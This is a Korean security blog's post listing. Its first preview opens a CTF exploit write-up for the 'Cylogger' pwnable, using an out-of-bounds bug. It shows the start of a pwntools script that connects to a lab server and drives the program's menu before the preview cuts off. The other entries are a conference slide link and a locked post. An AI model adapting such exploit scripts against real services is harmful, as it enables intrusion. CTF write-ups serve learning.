cdor1's lab
WHL_Cykor - Cylogger
서브취약점(OOB-Out Of Bound) 브포해서 풀었지만 실수로 쉘을 날려보낸 슬픈 스토리가 있는 익스코드이다. from pwn import * #s = process('./cylogger', env={'LD_PRELOAD':'./libc.so.6'}) while True: try: s = remote('10.10.200.203', 10002) def Leave(select, size, data): s.recvuntil('>> ') s.sendline('L') s.recvuntil('>> ') s.sendline(str(select)) if(select == 1): s.recvuntil('Size of Log >>') s.sendline(str(size)) s.sendline(data) def See..
Security/Pwnable
2017. 8. 30. 01:39
2017_Inc0gnito_NOE_systems_final.pptx
인코그니토 noe.systems 운영 관련 발표자료입니다.https://drive.google.com/file/d/0By7HICPJ1Bt8aUQ3dlpldWdwdUk/view?usp=sharing
Life/Daily Life
2017. 8. 25. 11:19
pwnable.tw unexploitable
보호되어 있는 글입니다.
Security/Pwnable
2017. 8. 11. 20:25